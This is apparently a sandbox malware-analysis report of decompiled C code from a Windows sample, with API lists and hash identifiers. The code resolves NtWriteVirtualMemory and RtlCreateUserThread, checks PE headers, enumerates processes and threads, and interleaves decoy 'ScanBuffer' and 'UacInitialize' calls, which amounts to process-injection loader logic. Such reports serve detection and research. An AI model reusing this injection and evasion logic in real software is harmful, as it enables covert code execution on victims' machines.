                    							E03264698( &_v484, E03264964(_v488));
                    							_push(_v484);
                    							E032647B0( &_v496,  *0x329e544, 0x327c094);
                    							E03264698( &_v492, E03264964(_v496));
                    							_pop(_t1512);
                    							E03277C04(_v492,  *0x329e544, _t1512, _t1612);
                    							 *0x329e520 =  *((intOrPtr*)(_v12 + 0x28)) +  *0x329e538;
                    							_push(0x327c094);
                    							_push( *0x329e544);
                    							_push("ScanString");
                    							E03264824();
                    							E03264698( &_v500, E03264964(_v504));
                    							_push(_v500);
                    							E032647B0( &_v512,  *0x329e544, 0x327c094);
                    							E03264698( &_v508, E03264964(_v512));
                    							_pop(_t1517);
                    							E03277C04(_v508,  *0x329e544, _t1517, _t1612);
                    							_push(0x327c094);
                    							_push( *0x329e544);
                    							_push("UacInitialize");
                    							E03264824();
                    							E03264698( &_v516, E03264964(_v520));
                    							_push(_v516);
                    							E032647B0( &_v528,  *0x329e544, 0x327c094);
                    							E03264698( &_v524, E03264964(_v528));
                    							_pop(_t1522);
                    							E03277C04(_v524,  *0x329e544, _t1522, _t1612);
                    							_push(0x327c094);
                    							_push( *0x329e544);
                    							_push("ScanBuffer");
                    							E03264824();
                    							E03264698( &_v532, E03264964(_v536));
                    							_push(_v532);
                    							E032647B0( &_v544,  *0x329e544, 0x327c094);
                    							E03264698( &_v540, E03264964(_v544));
                    							_pop(_t1527);
                    							E03277C04(_v540,  *0x329e544, _t1527, _t1612);
                    							_t1059 = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\ntdll.dll"), "NtWriteVirtualMemory");
                    							_t1528 =  *0x329a888; // 0x329e320
                    							 *_t1528 = _t1059;
                    							_push(0x327c094);
                    							_push( *0x329e544);
                    							_push("UacInitialize");
                    							E03264824();
                    							E03264698( &_v548, E03264964(_v552));
                    							_push(_v548);
                    							E032647B0( &_v560,  *0x329e544, 0x327c094);
                    							E03264698( &_v556, E03264964(_v560));
                    							_pop(_t1533);
                    							E03277C04(_v556,  *0x329e544, _t1533, _t1612);
                    							_push(0x327c094);
                    							_push( *0x329e544);
                    							_push("OpenSession");
                    							E03264824();
                    							E03264698( &_v564, E03264964(_v568));
                    							_push(_v564);
                    							E032647B0( &_v576,  *0x329e544, 0x327c094);
                    							E03264698( &_v572, E03264964(_v576));
                    							_pop(_t1538);
                    							E03277C04(_v572,  *0x329e544, _t1538, _t1612);
                    							_push(0x327c094);
                    							_push( *0x329e544);
                    							_push("ScanBuffer");
                    							E03264824();
                    							E03264698( &_v580, E03264964(_v584));
                    							_push(_v580);
                    							E032647B0( &_v592,  *0x329e544, 0x327c094);
                    							E03264698( &_v588, E03264964(_v592));
                    							_pop(_t1543);
                    							E03277C04(_v588,  *0x329e544, _t1543, _t1612);
                    							_t1102 =  *0x329e540; // 0x0
                    							_t1103 =  *0x329e52c; // 0x0
                    							_t1104 =  *0x329e534; // 0x0
                    							_t1105 =  *0x329e538; // 0x0
                    							_t1107 =  *0x329a888; // 0x329e320
                    							 *( *_t1107)( *0x329e53c, _t1105, _t1104, _t1103, _t1102);
                    							_push(0x327c094);
                    							_push( *0x329e544);
                    							_push("ScanBuffer");
                    							E03264824();
                    							E03264698( &_v596, E03264964(_v600));
                    							_push(_v596);
                    							E032647B0( &_v608,  *0x329e544, 0x327c094);
                    							E03264698( &_v604, E03264964(_v608));
                    							_pop(_t1548);
                    							E03277C04(_v604,  *0x329e544, _t1548, _t1612);
                    							_t1125 = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\ntdll.dll"), "RtlCreateUserThread");
                    							_t1549 =  *0x329a808; // 0x329e314
                    							 *_t1549 = _t1125;
                    							 *0x329e518 = 0;
                    							 *0x329e51c = 0;
                    							_push(0x327c094);
                    							_push( *0x329e544);
                    							_push("UacInitialize");
                    							E03264824();
                    							E03264698( &_v612, E03264964(_v616));
                    							_push(_v612);
                    							E032647B0( &_v624,  *0x329e544, 0x327c094);
                    							E03264698( &_v620, E03264964(_v624));
                    							_pop(_t1554);
                    							E03277C04(_v620,  *0x329e544, _t1554, _t1612);
                    							_push(0x327c094);
                    							_push( *0x329e544);
                    							_push("ScanString");
                    							E03264824();
                    							E03264698( &_v628, E03264964(_v632));
                    							_push(_v628);
                    							E032647B0( &_v640,  *0x329e544, 0x327c094);
                    							E03264698( &_v636, E03264964(_v640));
                    							_pop(_t1559);
                    							E03277C04(_v636,  *0x329e544, _t1559, _t1612);
                    							_push(0x327c094);
                    							_push( *0x329e544);
                    							_push("OpenSession");
                    							E03264824();
                    							E03264698( &_v644, E03264964(_v648));
                    							_push(_v644);
                    							E032647B0( &_v656,  *0x329e544, 0x327c094);
                    							E03264698( &_v652, E03264964(_v656));
                    							_pop(_t1564);
                    							E03277C04(_v652,  *0x329e544, _t1564, _t1612);
                    							_push(0x327c094);
                    							_push( *0x329e544);
                    							_push("UacInitialize");
                    							E03264824();
                    							E03264698( &_v660, E03264964(_v664));
                    							_push(_v660);
                    							E032647B0( &_v672,  *0x329e544, 0x327c094);
                    							E03264698( &_v668, E03264964(_v672));
                    							_pop(_t1569);
                    							E03277C04(_v668,  *0x329e544, _t1569, _t1612);
                    							_push(0x327c094);
                    							_push( *0x329e544);
                    							_push("ScanBuffer");
                    							E03264824();
                    							E03264698( &_v676, E03264964(_v680));
                    							_push(_v676);
                    							E032647B0( &_v688,  *0x329e544, 0x327c094);
                    							E03264698( &_v684, E03264964(_v688));
                    							_pop(_t1574);
                    							E03277C04(_v684,  *0x329e544, _t1574, _t1612);
                    							_t1198 =  *0x329e51c; // 0x0
                    							_t1199 =  *0x329e520; // 0x0
                    							_t1201 =  *0x329a808; // 0x329e314
                    							 *( *_t1201)( *0x329e53c, 0, 0, 0, 0, 0, _t1199, 0, 0x329e518, _t1198);
                    							_push(0x327c094);
                    							_push( *0x329e544);
                    							_push("ScanBuffer");
                    							E03264824();
                    							E03264698( &_v692, E03264964(_v696));
                    							_push(_v692);
                    							E032647B0( &_v704,  *0x329e544, 0x327c094);
                    							E03264698( &_v700, E03264964(_v704));
                    							_pop(_t1579);
                    							E03277C04(_v700,  *0x329e544, _t1579, _t1612);
                    							_t1613 =  *0x329e518;
                    							if( *0x329e518 != 0) {
                    								_v5 = 1;
                    								_t1218 =  *0x329e518; // 0x0
                    								CloseHandle(_t1218);
                    							}
                    							goto L19;
                    						}
                    						_t1225 = _t907 + 1;
                    						_t1609 = _t1225;
                    						_v14 = _t1225;
                    						do {
                    							_t1226 =  *0x329e524; // 0x0
                    							_t1227 =  *0x329e524; // 0x0
                    							_t1228 =  *0x329e524; // 0x0
                    							E0327A580( *((intOrPtr*)(_t1228 + 0xc)) +  *0x329e534,  *((intOrPtr*)(_t1226 + 0x10)),  *((intOrPtr*)(_t1227 + 0x14)) +  *0x329e530);
                    							_push(0x327c094);
                    							_push( *0x329e544);
                    							_push("ScanBuffer");
                    							E03264824();
                    							E03264698( &_v372, E03264964(_v376));
                    							_push(_v372);
                    							E032647B0( &_v384,  *0x329e544, 0x327c094);
                    							E03264698( &_v380, E03264964(_v384));
                    							_pop(_t1589);
                    							E03277C04(_v380,  *0x329e544, _t1589, _t1609);
                    							_t1246 =  *0x329e524; // 0x0
                    							 *0x329e524 = _t1246 + 0x28;
                    							_t208 =  &_v14;
                    							 *_t208 = _v14 - 1;
                    							_t1610 =  *_t208;
                    						} while ( *_t208 != 0);
                    						goto L14;
                    					}
                    				}
                    			}


                    APIs
                      • Part of subcall function 03277C04: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,03277CA2), ref: 03277C3C
                      • Part of subcall function 03277C04: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,03277CA2), ref: 03277C4A
                      • Part of subcall function 03277C04: GetProcAddress.KERNEL32(73990000,00000000), ref: 03277C63
                      • Part of subcall function 03277C04: FreeLibrary.KERNEL32(73990000,73990000,00000000,00000000,00000000,00000000,00000000,00000000,03277CA2), ref: 03277C82
                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtOpenProcess,ScanBuffer,0329E544,0327C094,UacInitialize,0329E544,0327C094,ScanString,0329E544,0327C094,UacInitialize,0329E544,0327C094,ScanString,0329E544), ref: 0327A9CE
                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0327A9D4
                      • Part of subcall function 03262EE0: QueryPerformanceCounter.KERNEL32 ref: 03262EE4
                    • GetCurrentProcess.KERNEL32(00000000,00000000,?,?,?,?,00000062,00000000,00000000), ref: 0327AC5A
                      • Part of subcall function 032779BC: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 032779C9
                      • Part of subcall function 032779BC: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 032779CF
                    • IsBadReadPtr.KERNEL32(00000000,00000040,?,?,00000062,00000000,00000000), ref: 0327ADF6
                    • IsBadReadPtr.KERNEL32(?,000000F8,00000000,00000040,?,?,00000062,00000000,00000000), ref: 0327AE23
                    • GetCurrentProcess.KERNEL32(00000000,00000000,00003000,00000040,?,000000F8,00000000,00000040,?,?,00000062,00000000,00000000), ref: 0327AE7A
                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,ScanBuffer,0329E544,0327C094,UacInitialize,0329E544,0327C094,ScanString,0329E544,0327C094,ScanBuffer,0329E544,0327C094,OpenSession,0329E544), ref: 0327B7A5
                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0327B7AB
                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,RtlCreateUserThread,ScanBuffer,0329E544,0327C094,?,?,00000062,00000000,00000000), ref: 0327B9AA
                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0327B9B0
                    • CloseHandle.KERNEL32(00000000,ScanBuffer,0329E544,0327C094,?,?,00000062,00000000,00000000), ref: 0327BCB1
                    • NtFreeVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00004000,OpenSession,0329E544,0327C094,ScanString,0329E544,0327C094,UacInitialize,0329E544,0327C094,OpenSession,0329E544,0327C094), ref: 0327BE22
                    • GetCurrentProcess.KERNEL32(00000000,00000000,00004000,?,000000F8,00000000,00000040,?,?,00000062,00000000,00000000), ref: 0327BE38
                    • NtFreeVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00004000,?,000000F8,00000000,00000040,?,?,00000062,00000000,00000000), ref: 0327BE3E
                    • GetCurrentProcess.KERNEL32(00000000,00000000,?,?,00000062,00000000,00000000), ref: 0327BE56
                    • NtFreeVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,?,?,00000062,00000000,00000000), ref: 0327BE5C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: Handle$AddressModuleProc$CurrentFreeProcess$MemoryVirtual$LibraryRead$CloseCounterLoadPerformanceQuery
                    • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Windows\System32\ntdll.dll$I_QueryTagInformation$Initialize$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$NtWriteVirtualMemory$OpenSession$RtlCreateUserThread$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$ntdll
                    • API String ID: 1521529492-530569836
                    • Opcode ID: 6dec4b7f58b75d378b319bb6f3a7c37b4dae375d99339c1ffe243cb0db6e0145
                    • Instruction ID: 4cc3b0a705797441538eed62a97772eab11326ec2a81458920118127718aa2f6
                    • Opcode Fuzzy Hash: 6dec4b7f58b75d378b319bb6f3a7c37b4dae375d99339c1ffe243cb0db6e0145
                    • Instruction Fuzzy Hash: CCD22038A212699FDB15FBB5DC90BDE73B5BF45700F1081A2A148AF214DAB09EC5CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0327A0C8() {
                    
                    				if( *0x329e4c8 == 0) {
                    					 *0x329e4c8 = GetModuleHandleA("kernel32.dll");
                    					if( *0x329e4c8 != 0) {
                    						 *0x329e4cc = GetProcAddress( *0x329e4c8, "CreateToolhelp32Snapshot");
                    						 *0x329e4d0 = GetProcAddress( *0x329e4c8, "Heap32ListFirst");
                    						 *0x329e4d4 = GetProcAddress( *0x329e4c8, "Heap32ListNext");
                    						 *0x329e4d8 = GetProcAddress( *0x329e4c8, "Heap32First");
                    						 *0x329e4dc = GetProcAddress( *0x329e4c8, "Heap32Next");
                    						 *0x329e4e0 = GetProcAddress( *0x329e4c8, "Toolhelp32ReadProcessMemory");
                    						 *0x329e4e4 = GetProcAddress( *0x329e4c8, "Process32First");
                    						 *0x329e4e8 = GetProcAddress( *0x329e4c8, "Process32Next");
                    						 *0x329e4ec = GetProcAddress( *0x329e4c8, "Process32FirstW");
                    						 *0x329e4f0 = GetProcAddress( *0x329e4c8, "Process32NextW");
                    						 *0x329e4f4 = GetProcAddress( *0x329e4c8, "Thread32First");
                    						 *0x329e4f8 = GetProcAddress( *0x329e4c8, "Thread32Next");
                    						 *0x329e4fc = GetProcAddress( *0x329e4c8, "Module32First");
                    						 *0x329e500 = GetProcAddress( *0x329e4c8, "Module32Next");
                    						 *0x329e504 = GetProcAddress( *0x329e4c8, "Module32FirstW");
                    						 *0x329e508 = GetProcAddress( *0x329e4c8, "Module32NextW");
                    					}
                    				}
                    				if( *0x329e4c8 == 0 ||  *0x329e4cc == 0) {
                    					return 0;
                    				} else {
                    					return 1;
                    				}
                    			}




                    APIs
                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0327A34F,?,?,0327A3E1,00000000,0327A4BD), ref: 0327A0DC
                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0327A0F4
                    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0327A106
                    • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0327A118
                    • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0327A12A
                    • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0327A13C
                    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0327A14E
                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0327A160
                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0327A172
                    • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0327A184
                    • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0327A196
                    • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0327A1A8
                    • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0327A1BA
                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0327A1CC
                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0327A1DE
                    • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0327A1F0
                    • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0327A202
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: AddressProc$HandleModule
                    • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                    • API String ID: 667068680-597814768
                    • Opcode ID: 25ada1ddf5ef50eb131927331738b934cdfce692ca83a253cfc233dd523bacb5
                    • Instruction ID: db8d46e60164df7f1ac23460c1f019a78577189627d7e7712c1a221d49ef7f67
                    • Opcode Fuzzy Hash: 25ada1ddf5ef50eb131927331738b934cdfce692ca83a253cfc233dd523bacb5
                    • Instruction Fuzzy Hash: 2B31BEB4561710EFDB00FFB4F889E2D37A8BF06A10F51566AB410DF619D6B994D0CB22
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 45%
                    			E03277F54(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __fp0) {
                    				intOrPtr _v8;
                    				char _v12;
                    				intOrPtr _v16;
                    				char _v20;
                    				char _v24;
                    				char _v28;
                    				intOrPtr _v32;
                    				char _v36;
                    				char _v40;
                    				char _v44;
                    				intOrPtr _v48;
                    				char _v52;
                    				char _v56;
                    				char _v60;
                    				intOrPtr _v64;
                    				char _v68;
                    				char _v72;
                    				void* _v76;
                    				void* _v80;
                    				void* _v84;
                    				void* _v88;
                    				char _v92;
                    				void* _v96;
                    				void* _v100;
                    				void* _v104;
                    				void* _v108;
                    				void* _v112;
                    				void* _v116;
                    				void* _v120;
                    				void* _v124;
                    				void* _v128;
                    				void* _v132;
                    				void* _v136;
                    				void* _v140;
                    				void* _v144;
                    				void* _v148;
                    				char _v152;
                    				char _v156;
                    				void* _v160;
                    				void* _v164;
                    				void* _v168;
                    				void* _v172;
                    				char _v176;
                    				intOrPtr _v180;
                    				char _v184;
                    				char _v188;
                    				char _v192;
                    				intOrPtr _v196;
                    				char _v200;
                    				char _v204;
                    				char _v208;
                    				intOrPtr _v212;
                    				char _v216;
                    				char _v220;
                    				char _v224;
                    				intOrPtr _v228;
                    				char _v232;
                    				char _v236;
                    				char _v240;
                    				intOrPtr _v244;
                    				char _v248;
                    				char _v252;
                    				char _v256;
                    				intOrPtr _v260;
                    				char _v264;
                    				char _v268;
                    				char _v272;
                    				intOrPtr _v276;
                    				char _v280;
                    				char _v284;
                    				char _v288;
                    				intOrPtr _v292;
                    				char _v296;
                    				char _v300;
                    				char _v304;
                    				intOrPtr _v308;
                    				char _v312;
                    				char _v316;
                    				char _v320;
                    				intOrPtr _v324;
                    				char _v328;
                    				char _v332;
                    				char _v336;
                    				intOrPtr _v340;
                    				char _v344;
                    				char _v348;
                    				char _v352;
                    				intOrPtr _v356;
                    				char _v360;
                    				char _v364;
                    				char _v368;
                    				intOrPtr _v372;
                    				char _v376;
                    				char _v380;
                    				char _v384;
                    				intOrPtr _v388;
                    				char _v392;
                    				char _v396;
                    				char _v400;
                    				intOrPtr _v404;
                    				char _v408;
                    				char _v412;
                    				char _v416;
                    				intOrPtr _v420;
                    				char _v424;
                    				char _v428;
                    				char _v432;
                    				intOrPtr _v436;
                    				char _v440;
                    				char _v444;
                    				char _v448;
                    				intOrPtr _v452;
                    				char _v456;
                    				char _v460;
                    				char _v464;
                    				intOrPtr _v468;
                    				char _v472;
                    				char _v476;
                    				char _v480;
                    				intOrPtr _v484;
                    				char _v488;
                    				char _v492;
                    				char _v496;
                    				intOrPtr _v500;
                    				char _v504;
                    				char _v508;
                    				char _v512;
                    				intOrPtr _v516;
                    				char _v520;
                    				char _v524;
                    				char _v528;
                    				intOrPtr _v532;
                    				char _v536;
                    				char _v540;
                    				char _v544;
                    				intOrPtr _v548;
                    				char _v552;
                    				char _v556;
                    				char _v560;
                    				intOrPtr _v564;
                    				char _v568;
                    				char _v572;
                    				char _v576;
                    				intOrPtr _v580;
                    				char _v584;
                    				char _v588;
                    				char _v592;
                    				intOrPtr _v596;
                    				char _v600;
                    				char _v604;
                    				char _v608;
                    				intOrPtr _v612;
                    				char _v616;
                    				char _v620;
                    				char _v624;
                    				intOrPtr _v628;
                    				char _v632;
                    				char _v636;
                    				char _v640;
                    				intOrPtr _v644;
                    				char _v648;
                    				char _v652;
                    				char _v656;
                    				intOrPtr _v660;
                    				char _v664;
                    				char _v668;
                    				char _v672;
                    				intOrPtr _v676;
                    				char _v680;
                    				char _v684;
                    				char _v688;
                    				intOrPtr _v692;
                    				char _v696;
                    				char _v700;
                    				char _v704;
                    				intOrPtr _v708;
                    				char _v712;
                    				char _v716;
                    				char _v720;
                    				intOrPtr _v724;
                    				char _v728;
                    				char _v732;
                    				char _v736;
                    				intOrPtr _v740;
                    				char _v744;
                    				char _v748;
                    				char _v752;
                    				intOrPtr _v756;
                    				char _v760;
                    				char _v764;
                    				char _v768;
                    				intOrPtr _v772;
                    				char _v776;
                    				char _v780;
                    				char _v784;
                    				intOrPtr _v788;
                    				char _v792;
                    				char _v796;
                    				char _v800;
                    				intOrPtr _v804;
                    				char _v808;
                    				char _v812;
                    				char _v816;
                    				intOrPtr _v820;
                    				char _v824;
                    				char _v828;
                    				char _v832;
                    				intOrPtr _v836;
                    				char _v840;
                    				char _v844;
                    				char _v848;
                    				intOrPtr _v852;
                    				char _v856;
                    				char _v860;
                    				char _v864;
                    				intOrPtr _v868;
                    				char _v872;
                    				char _v876;
                    				char _v880;
                    				intOrPtr _v884;
                    				char _v888;
                    				char _v892;
                    				char _v896;
                    				intOrPtr _v900;
                    				char _v904;
                    				char _v908;
                    				char _v912;
                    				intOrPtr _v916;
                    				char _v920;
                    				char _v924;
                    				char _v928;
                    				intOrPtr _v932;
                    				char _v936;
                    				char _v940;
                    				char _v944;
                    				intOrPtr _v948;
                    				char _v952;
                    				char _v956;
                    				char _v960;
                    				intOrPtr _v964;
                    				char _v968;
                    				char _v972;
                    				char _v976;
                    				intOrPtr _v980;
                    				char _v984;
                    				char _v988;
                    				char _v992;
                    				intOrPtr _v996;
                    				char _v1000;
                    				char _v1004;
                    				char _v1008;
                    				intOrPtr _v1012;
                    				char _v1016;
                    				char _v1020;
                    				char _v1024;
                    				intOrPtr _v1028;
                    				char _v1032;
                    				char _v1036;
                    				char _v1040;
                    				intOrPtr _v1044;
                    				char _v1048;
                    				char _v1052;
                    				short* _t604;
                    				intOrPtr _t617;
                    				intOrPtr* _t620;
                    				intOrPtr _t734;
                    				void* _t819;
                    				int _t820;
                    				intOrPtr _t877;
                    				void* _t879;
                    				intOrPtr _t881;
                    				long _t883;
                    				intOrPtr _t884;
                    				void* _t886;
                    				intOrPtr _t946;
                    				long _t962;
                    				void* _t963;
                    				void* _t964;
                    				intOrPtr _t1036;
                    				void* _t1038;
                    				intOrPtr _t1110;
                    				intOrPtr _t1112;
                    				void* _t1169;
                    				void* _t1199;
                    				void* _t1288;
                    				void* _t1290;
                    				void* _t1292;
                    				void* _t1294;
                    				void* _t1296;
                    				void* _t1298;
                    				void* _t1300;
                    				intOrPtr _t1386;
                    				intOrPtr _t1387;
                    				intOrPtr _t1389;
                    				intOrPtr _t1433;
                    				intOrPtr _t1535;
                    				void* _t1537;
                    				long _t1539;
                    				void* _t1540;
                    				long _t1542;
                    				void* _t1543;
                    				void* _t1561;
                    				void* _t1645;
                    				void* _t1650;
                    				void* _t1655;
                    				void* _t1660;
                    				intOrPtr _t1661;
                    				void* _t1699;
                    				void* _t1704;
                    				signed int _t1705;
                    				void* _t1711;
                    				void* _t1716;
                    				void* _t1721;
                    				void* _t1726;
                    				void* _t1731;
                    				void* _t1736;
                    				void* _t1741;
                    				void* _t1746;
                    				void* _t1751;
                    				void* _t1756;
                    				void* _t1761;
                    				void* _t1766;
                    				void* _t1771;
                    				void* _t1776;
                    				void* _t1781;
                    				void* _t1786;
                    				void* _t1791;
                    				void* _t1796;
                    				void* _t1801;
                    				void* _t1806;
                    				void* _t1811;
                    				void* _t1816;
                    				void* _t1821;
                    				void* _t1826;
                    				void* _t1831;
                    				void* _t1836;
                    				void* _t1841;
                    				void* _t1846;
                    				void* _t1851;
                    				void* _t1856;
                    				void* _t1861;
                    				void* _t1866;
                    				void* _t1871;
                    				void* _t1877;
                    				void* _t1882;
                    				void* _t1887;
                    				void* _t1892;
                    				void* _t1904;
                    				void* _t1909;
                    				void* _t1914;
                    				void* _t1919;
                    				void* _t1924;
                    				void* _t1929;
                    				void _t1930;
                    				void _t1932;
                    				void* _t1937;
                    				void* _t1942;
                    				void* _t1947;
                    				intOrPtr _t1949;
                    				void* _t1954;
                    				void* _t1959;
                    				void* _t1964;
                    				void* _t1969;
                    				void* _t1974;
                    				void* _t1979;
                    				void* _t1984;
                    				intOrPtr _t1994;
                    				void* _t1995;
                    				intOrPtr _t1997;
                    				intOrPtr _t1998;
                    				void* _t2006;
                    				void* _t2009;
                    				void* _t2013;
                    
                    				_t2013 = __fp0;
                    				_t1997 = _t1998;
                    				_t1561 = 0x83;
                    				do {
                    					_push(0);
                    					_push(0);
                    					_t1561 = _t1561 - 1;
                    					_t2001 = _t1561;
                    				} while (_t1561 != 0);
                    				_t1994 = __edx;
                    				_v8 = __eax;
                    				E03264954(_v8);
                    				_push(_t1997);
                    				_push(0x3279f25);
                    				_push( *[fs:eax]);
                    				 *[fs:eax] = _t1998;
                    				E032644F4(0x329e35c, 0x3279f40);
                    				_push(0x3279f4c);
                    				_push( *0x329e35c);
                    				_push("OpenSession");
                    				E03264824();
                    				E03264698( &_v12, E03264964(_v16));
                    				_push(_v12);
                    				E032647B0( &_v24,  *0x329e35c, 0x3279f4c);
                    				E03264698( &_v20, E03264964(_v24));
                    				_pop(_t1645);
                    				E03277C04(_v20,  *0x329e35c, _t1645, _t2001);
                    				_push(0x3279f4c);
                    				_push( *0x329e35c);
                    				_push("ScanBuffer");
                    				E03264824();
                    				E03264698( &_v28, E03264964(_v32));
                    				_push(_v28);
                    				E032647B0( &_v40,  *0x329e35c, 0x3279f4c);
                    				E03264698( &_v36, E03264964(_v40));
                    				_pop(_t1650);
                    				E03277C04(_v36,  *0x329e35c, _t1650, _t2001);
                    				_push(0x3279f4c);
                    				_push( *0x329e35c);
                    				_push("Initialize");
                    				E03264824();
                    				E03264698( &_v44, E03264964(_v48));
                    				_push(_v44);
                    				E032647B0( &_v56,  *0x329e35c, 0x3279f4c);
                    				E03264698( &_v52, E03264964(_v56));
                    				_pop(_t1655);
                    				E03277C04(_v52,  *0x329e35c, _t1655, _t2001);
                    				_push(0x3279f4c);
                    				_push( *0x329e35c);
                    				_push("OpenSession");
                    				E03264824();
                    				E03264698( &_v60, E03264964(_v64));
                    				_push(_v60);
                    				E032647B0( &_v72,  *0x329e35c, 0x3279f4c);
                    				E03264698( &_v68, E03264964(_v72));
                    				_pop(_t1660);
                    				E03277C04(_v68,  *0x329e35c, _t1660, _t2001);
                    				 *0x329e4a4 = _t1994;
                    				_t604 =  *0x329e4a4; // 0x0
                    				if( *_t604 == 0x5a4d) {
                    					_push(0);
                    					_push(_t1994);
                    					_t617 =  *0x329e4a4; // 0x0
                    					asm("cdq");
                    					asm("adc edx, [esp+0x4]");
                    					 *0x329e4a8 =  *((intOrPtr*)(_t617 + 0x3c)) + _v92;
                    					_t620 =  *0x329e4a8; // 0x0
                    					if( *_t620 == 0x4550) {
                    						_push(0x3279f4c);
                    						_push( *0x329e35c);
                    						_push("UacInitialize");
                    						E03264824();
                    						E03264698( &_v176, E03264964(_v180));
                    						_push(_v176);
                    						E032647B0( &_v188,  *0x329e35c, 0x3279f4c);
                    						E03264698( &_v184, E03264964(_v188));
                    						_pop(_t1699);
                    						E03277C04(_v184,  *0x329e35c, _t1699, _t2004);
                    						_push(0x3279f4c);
                    						_push( *0x329e35c);
                    						_push("OpenSession");
                    						E03264824();
                    						E03264698( &_v192, E03264964(_v196));
                    						_push(_v192);
                    						E032647B0( &_v204,  *0x329e35c, 0x3279f4c);
                    						E03264698( &_v200, E03264964(_v204));
                    						_pop(_t1704);
                    						E03277C04(_v200,  *0x329e35c, _t1704, _t2004);
                    						E03262EE0();
                    						 *0x329e4c4 = (E03262F08(9) + 1) * 0x5f5e100;
                    						_t734 =  *0x329e4a8; // 0x0
                    						_t1705 =  *0x329e4c4; // 0x0
                    						 *0x329e4c0 = _t1705 -  *((intOrPtr*)(_t734 + 0x50));
                    						_push(0x3279f4c);
                    						_push( *0x329e35c);
                    						_push("UacInitialize");
                    						E03264824();
                    						E03264698( &_v208, E03264964(_v212));
                    						_push(_v208);
                    						E032647B0( &_v220,  *0x329e35c, 0x3279f4c);
                    						E03264698( &_v216, E03264964(_v220));
                    						_pop(_t1711);
                    						E03277C04(_v216,  *0x329e35c, _t1711, _t2004);
                    						_push(0x3279f4c);
                    						_push( *0x329e35c);
                    						_push("ScanString");
                    						E03264824();
                    						E03264698( &_v224, E03264964(_v228));
                    						_push(_v224);
                    						E032647B0( &_v236,  *0x329e35c, 0x3279f4c);
                    						E03264698( &_v232, E03264964(_v236));
                    						_pop(_t1716);
                    						E03277C04(_v232,  *0x329e35c, _t1716, _t2004);
                    						0x329e3d8->ContextFlags = 0x10007;
                    						_push(0x3279f4c);
                    						_push( *0x329e35c);
                    						_push("UacInitialize");
                    						E03264824();
                    						E03264698( &_v240, E03264964(_v244));
                    						_push(_v240);
                    						E032647B0( &_v252,  *0x329e35c, 0x3279f4c);
                    						E03264698( &_v248, E03264964(_v252));
                    						_pop(_t1721);
                    						E03277C04(_v248,  *0x329e35c, _t1721, _t2004);
                    						_push(0x3279f4c);
                    						_push( *0x329e35c);
                    						_push("UacScan");
                    						E03264824();
